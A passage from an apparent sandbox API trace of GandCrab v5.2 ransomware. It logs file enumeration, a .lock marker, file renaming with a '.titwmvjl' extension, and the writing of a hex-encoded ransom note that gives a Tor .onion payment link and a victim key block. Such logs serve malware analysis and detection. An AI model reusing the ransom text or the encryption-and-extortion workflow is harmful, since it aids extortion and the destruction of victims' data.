8\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.332] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.333] CloseHandle (hObject=0x230) returned 1 [0096.333] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.333] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.333] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x285)) [0096.333] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.333] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.333] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.333] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.334] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\documents\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.334] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.334] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.334] lstrlenW (lpString="C:\\Users\\Default\\Documents\\") returned 27 [0096.334] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Documents\\*") returned="C:\\Users\\Default\\Documents\\*" [0096.334] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Documents\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x503678 [0096.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.335] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.335] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.335] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.335] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.335] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock" [0096.335] lstrlenW (lpString=".titwmvjl") returned 9 [0096.335] lstrlenW (lpString="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.335] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.336] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 60 [0096.336] lstrlenW (lpString="C:\\Users\\Default\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 51 [0096.336] lstrlenW (lpString=".lock") returned 5 [0096.336] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.336] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.336] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.336] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.336] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.336] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0096.336] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0096.336] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0096.336] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0096.336] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.337] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.337] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.337] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.337] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.337] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.338] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.338] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt") returned 57 [0096.338] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\documents\\my music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0096.340] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x